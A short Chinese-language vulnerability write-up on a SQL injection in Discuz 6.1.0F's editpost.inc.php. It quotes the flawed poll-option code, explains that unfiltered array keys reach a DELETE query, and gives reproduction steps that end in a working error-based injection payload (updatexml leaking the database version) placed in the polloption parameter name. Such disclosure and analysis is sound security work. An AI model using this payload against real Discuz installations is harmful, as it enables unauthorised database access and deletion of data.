问题代码:
Discuz_6.1.0F_SC_UTF8includeeditpost.inc.php 288行
$pollarray = '';
$pollarray['options'] = $polloption;
if($pollarray['options']) {
if(count($pollarray['options']) > $maxpolloptions) {
showmessage('post_poll_option_toomany');
}
foreach($pollarray['options'] as $key => $value) {//这里直接解析出来没处理$key
if(!trim($value)) {
$db->query("DELETE FROM {$tablepre}polloptions WHERE polloptionid='$key' AND tid='$tid'");//直接带入key值
unset($pollarray['options'][$key]);
}
}
对用户提交的polloption数组直接解析出来带入SQL语句,因为默认只对数组值过滤,而不过滤键,所以会导致一个DELETE注入。
问题复现:
首先需要一个有新建投票帖子的权限的用户,这里本地搭建,就用admin进行测试
先新建个投票,然后找到帖子,点击“编辑”。
点击“编辑”,抓取数据包
name="polloption[1' or updatexml(1,concat(0x7e,(version())),0) or '1'='1]"